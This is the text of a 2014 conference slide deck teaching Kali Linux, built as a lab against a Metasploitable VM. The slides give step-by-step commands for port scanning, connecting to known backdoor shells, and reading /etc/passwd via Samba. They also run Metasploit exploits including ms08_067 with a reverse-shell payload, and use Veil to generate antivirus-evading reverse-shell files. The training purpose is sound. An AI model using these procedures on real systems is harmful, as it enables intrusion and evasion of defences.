Kali Linux

Presentation on Kali Linux

Ohio HTCIA 2014 Spring Conference
Salt Fork Lodge
Welcome – Salt Fork 2014
 Tony Godfrey is the CEO / Linux Consultant
of Falconer Technologies (est 2003) specializing in
Linux. He has written several articles on the body
of knowledge of security administration, is a
regular contributor to a variety of Linux
publications, and has written technical content for
Linux education nation-wide at the college level.
He also teaches topics covering Linux,
Network Security, Cisco routers, Cybercrime and
System Forensics.

Welcome
Who or What is ‘Kali’?
 Kali the mother goddess despite her
fearful appearance, protects the good
against the evil. Unlike the other Hindu
deities her form is pretty scary and
formidable, intended to scare away the
demons both literally and figuratively!

Anu Yadavalli

Who is Kali?
Hindu Kali
 Kali Linux is a Debian-derived Linux
distribution designed for digital forensics
and penetration testing. It is maintained
and funded by Offensive Security Ltd. It
was developed by Mati Aharoni and Devon
Kearns of Offensive Security through the
rewrite of BackTrack, their previous
forensics Linux distribution.

What is Kali Linux?

/books
◦ Official Kali Guide
◦ eForensics
/media
◦ 7-Zip, kali_iso, SD_formatter, Unetbootin,
USB_installer, VMware, Win32_DiskImager
/metaspolitable
/PPT

What’s on the DVD?

http://www.kali.org/
  We’re going to type something

 We’re going to make a note

 Might be a question?

 We’re going to click on something

 Recon  Attack

Legend
Ready?
Use your powers for good
- Let’s make a folder called  kali_2014
- Copy the DVD contents into that folder
- Install 7-Zip
- Install VMware Player

Let’s make sure the virtual environments are working and can ‘ping’
each other

Getting Ready…
Press <CTRL><Alt> at the same time to
be released from the current virtual
environment. You can then do a normal
<Alt><Tab> to toggle between different
applications.

VMware Player
Kali Login  root
Kali Password  password

Metaspolitable Login  msfadmin

Metaspolitable Password  msfadmin

Logins / Passwords
 Login  msfadmin
 Password  msfadmin

 ifconfig
 Jot down the IP & Netmask
 route
 Jot down the Gateway

Metaspolitable V/E
Virtual Environment #1
◦ Metaspolitable

 Go to TERMINAL
rlogin –l root <IP Address>
cd /tmp
ls -l ...vs... ls -la
rm .X0-lock
 startx

Metaspolitable V/E
 Login  root
 Password  password

 ifconfig
 Jot down the IP & Netmask
 route
 Jot down the Gateway

Kali V/E
Go to:

Applications  System Tools

 Preferences  System Settings
 Display  Resolution: ____

Then…[Apply]

Kali V/E
From the command line, type 

apt-get update && apt-get upgrade

Note: This has already been done to save time, but should be done
after a new installation.

Kali Updating
Are we good?
Top 10 Security Tools
Information Gathering
Vulnerability Analysis
Web Applications Password Attacks
Wireless Attacks Exploitation Tools
Sniffing/Spoofing Maintaining Access
Reverse Engineering
Stress Testing Hardware Hacking
Forensics Reporting Tools
System Services

There are several categories

Metapackages also exist
Command Line Tools
Presentation on Kali Linux
  ping
Packet InterNet Groper
Port = 8
Establishes physical connectivity between two entities

 (from Kali) ping <Target IP>

Did it echo back?

ping
  top
Tells us what services are running,
processes, memory allocation
Basically, a live system monitor

top
  df
Tells us how much space is available or
‘disk free’

df
  du
Tells us how much space is taken or
‘disk used’.
You can get a shorter report by…

 ‘du –s’ … (disk used –summary)

du
  free
How much ‘free’ memory is available

free
  ls
This is for ‘list’

 ls –l (list –long)
 ls -la (list – long – all attributes)

ls
  pwd
Directory structure

Means ‘path to working directory’ or

‘print working directory’

pwd
  ps
Means ‘Process Status’
◦ aux – auxiliary view
◦ pstree – shows parent/child relationships

◦ Windows – tasklist / taskkill

Kill - Stops a process (ex: kill PID)

ps / ps aux / pstree
Both Environments
Presentation on Kali Linux
Virtual Environment #1 (Metaspolitable)
◦ Go to TERMINAL
◦ ifconfig
◦ …jot this number down…

Virtual Environment #2 (Kali)

◦ Go to TERMINAL
◦ ifconfig
◦ …jot this number down…

Can you ‘ping’ each other?

CLI & Services
Presentation on Kali Linux
  traceroute
Essentially, ‘tracert’ in Windows

 traceroute –i eth0 <Target IP>

It displays the route (path) and measuring transit delays of packets

across an Internet Protocol (IP) network

traceroute
 

nmap –p0-65535 <Target IP> | less

A security scanner used to discover hosts and services on a

computer network, thus creating a "map" of the network

nmap
 

nmap –sS –Pn –A <Target IP>

A security scanner used to discover hosts and services on a

computer network – ‘sS’ is stealth scan, ‘Pn’ not to run a ping scan,
and ‘A’ is O/S detection, services, service pack.

nmap
  rlogin –l root <Target IP>

 whoami

 tcpdump -i eth0 host <Target IP>

A packet analyzer that runs under the command line. It allows the
user to intercept and display TCP/IP and other packets being
transmitted or received over a network to which the computer is
attached.

rlogin (from Metaspolitable)

 

rpcinfo –p <Target IP>

A utility makes a Remote Procedure Call (RPC) to an RPC server and reports
what it finds. It lists all programs registered with the port mapper on the
specified host.

rpcinfo
  showmount –e <Target IP>

 showmount –a <Target IP>

It displays a list of all clients that have remotely mounted a file system from a
specified machine in the Host parameter. This information is maintained by
the [mountd] daemon on the Host parameter.

showmount
  telnet <Target IP> 21
After '220...'

 user backdoored:)
 <CTRL><]>
 quit

Port 20/21 is FTP

telnet
  telnet <Target IP> 6200
After 'Escape character...',

 id;
<CTRL><]>
 quit

Port 6200 - Oracle Notification Service remote port Oracle Application Server

telnet
  telnet <Target IP> 6667

IRC (Internet Relay Chat)

Many trojans/backdoors also use this port: Dark Connection Inside, Dark FTP,
Host Control, NetBus worm , ScheduleAgent, SubSeven, Trinity, WinSatan,
Vampire, Moses, Maniacrootkit, kaitex, EGO.

telnet
  telnet <Target IP> 1524
After 'root@meta....',

 id

Many attack scripts install a backdoor shell at this port (especially those
against Sun systems via holes in sendmail and RPC services like statd,
ttdbserver, and cmsd). Connections to port 600/pcserver also have this
problem. Note: ingreslock, Trinoo; talks UDP/TCP.

telnet
Are we good?
  smbclient –L <//Target IP>
 msfconsole
...wait, wait, wait..., then
use auxiliary/admin/smb/samba_symlink_traversal

 set RHOST <Target IP>

 set SMBSHARE tmp

smbclient
  exploit

...Connecting to the server.....

...<yadda, yadda, yadda>...
...Auxiliary module....

At the prompt, type  exit

smbclient
  smbclient //<Target IP>/tmp

Do you get the 'smb: \>' prompt?

 cd rootfs
 cd etc
 more passwd
Do you get a list of all user accts?

smbclient
On Kali…

tcpdump –I eth0 src <Target IP>

On Metaspolitable…
ping
open a Browser & go to CNN.com

tcpdump
On Kali

netdiscover –i eth0 –r <Target IP>/24

Netdiscover is an active/passive address reconnaissance tool, mainly

developed for those wireless networks without DHCP server, when you are
wardriving. It can be also used on hub/switched networks.

netdiscover
On Kali

 nikto –h <Target IP>

Its an Open Source (GPL) web server scanner which performs

comprehensive tests against web servers for multiple items, including over
6700 potentially dangerous files/CGIs, checks for outdated versions of over
1250 servers, and version specific problems on over 270 servers.

nikto
On Kali

sqlmap –u http://<Target IP> --dbs

It is an open source penetration testing tool that automates the process of

detecting and exploiting SQL injection flaws and taking over of database
servers.

sqlmap
From Kali – open IceWeasel

 http://<Target IP>/
Research: Multillidae <p. 8>

The Mutillidae are a family of more than 3,000 species of wasps (despite the
names) whose wingless females resemble large, hairy ants. Their common
name ‘velvet ant’ refers to their dense pile of hair which most often is bright
scarlet or orange, but may also be black, white, silver, or gold.

Wasp Services
From Kali – open IceWeasel

 http://<Target IP>/
Research: Multillidae <p. 8>

Mutillidae is a free, open source web application provided to allow security

enthusiest to pen-test and hack a web application

Web Services
From Kali

 whatweb <Target IP>

 whatweb –v <Target IP>

 whatweb –a 4 <Target IP>

WhatWeb recognizes web technologies including content management

systems (CMS), blogging platforms, statistic/analytics packages, JavaScript
libraries, web servers, and embedded devices.

whatweb
From Kali - msfconsole
Presentation on Kali Linux
From Kali

 service postgresql start

 service metasploit start

 msfconsole

Let’s fire up the database (PostGreSql) – start Metasploit – start msfconsole

We will then take a look at the built-in exploit tools

msfconsole
From [msf>] console

 help search

 show exploits

 search dns

‘Help Search’ shows all of the options, ‘Show Exploits’ show all the built-in
exploits in msfconsole, ‘Search DNS’ will look for any DNS exploits.

msfconsole
From [msf>] console

 search Microsoft

 search diablo

 search irc

 search http
Let’s try a few more to see what they do….

msfconsole
From [msf>] console, search for ‘unreal’

 info <exploit>

 use <exploit>

 show options

 LHOST, RHOST, LPORT, RPORT

msfconsole
From [msf>] console (ex: unreal)

 set RHOST <IP Address>

 show options

 exploit

msfconsole
From [msf>] console, search for ‘twiki’

 info <exploit>

 use <exploit>

 show options

 LHOST, RHOST, LPORT, RPORT

msfconsole
From [msf>] console (ex: ‘twiki’)

 set RHOST <IP Address>

 show options

 exploit

msfconsole
From [msf>] console, (target: Win XP)

 use exploit/windows/smb/ms08_067_netapi

 show options

 show targets

 set target 2

msfconsole
From [msf>] console, (target: Win XP)

 show options

 show advanced

 show targets

 show payloads

msfconsole
From [msf>] console, (target: Win XP)

 set payload windows/shell_reverse_tcp

 show options

 set LHOST <Kali IP Address>

 set RHOST <Target IP Address>

msfconsole
From [msf>] console, (target: Win XP)

 show options

 exploit

 Any errors?

msfconsole
From Kali – more GUI
Presentation on Kali Linux
Let’s run Zenmap

 Applications  Kali Linux

 Information Gathering

 DNS Analysis

 Zenmap

Zenmap
Let’s run SHODAN

 Open a browser

 www.shodanhq.com

 type in ‘almost anything’

 …Be very nervous…

SHODAN
Let’s run FERN

 Kali Linux

 Wireless Attacks

 Wireless Tools

 fern-wifi-cracker

FERN
 Kali has many built-in tools, but you
can always install more (Debian-based).
But, you may always wish to add more
such as recon-ng.

recon-ng
automated info gathering and
network reconnaissance.

recon-ng
Let’s run recon-ng…

 cd /opt/recon-ng

 /usr/bin/python recon-ng

 show modules

 recon/hosts/gather/http/web/google_site

recon-ng
Let’s run recon-ng…

 set DOMAIN <domain.com>

 run (…let this run awhile…)

 back (…previous level…)

 show modules

recon-ng
Let’s run recon-ng…

 use reporting/csv

 run

 Will add your new information to

/usr/share/recon-ng/workspaces/default

recon-ng
If you want something more basic…dmitry

 dmitry –s <domain.com>

 It gives you site names & IP’s

dmitry
 Kali has many built-in tools, but you
can always install even more (Debian-
based). You may always wish to add more
such as veil.

veil
Remote shell payload generator
that can bypass many anti-virus
programs.

veil
Let’s run veil

 veil-evasion

 list (available payloads list)

 use 13 (powershell/VirtualAlloc)

 generate

veil
Let’s run veil

1 (msfvenom)

 [ENTER] (accept default)

 Value for LHOST (Target IP)

 Value for LPORT (ex: 4000)

veil
Let’s run veil

 Output name (“Squatch”)

 It will store this new batch file to the

 /usr/share/veil/output/source
folder. When the file is run from the target
machine, it will attempt to do a reverse
shell session with Kali.

veil
Final Thoughts…
Kali Information
See ‘Notes’ section in this slide
Kali Comparisons
See ‘Notes’ section in this slide
Kali-specific Websites
See ‘Notes’ section in this slide
Kali Publications
See ‘Notes’ section in this slide
Questions/Concerns
But wait, that’s not all
The Firefox web browser is great tool to
test vulnerabilities of a website. There is a
portable version on PortableApps. I would
suggest this version and install the needed
plugins. Then, fire up the browser and ‘use
your powers for good’.

Pentesting with Firefox?

Thank You
 Thank you for your time.

Falconer Technologies
[email protected]
877 / TUX RULZ or 877 / 889-7859

Thank you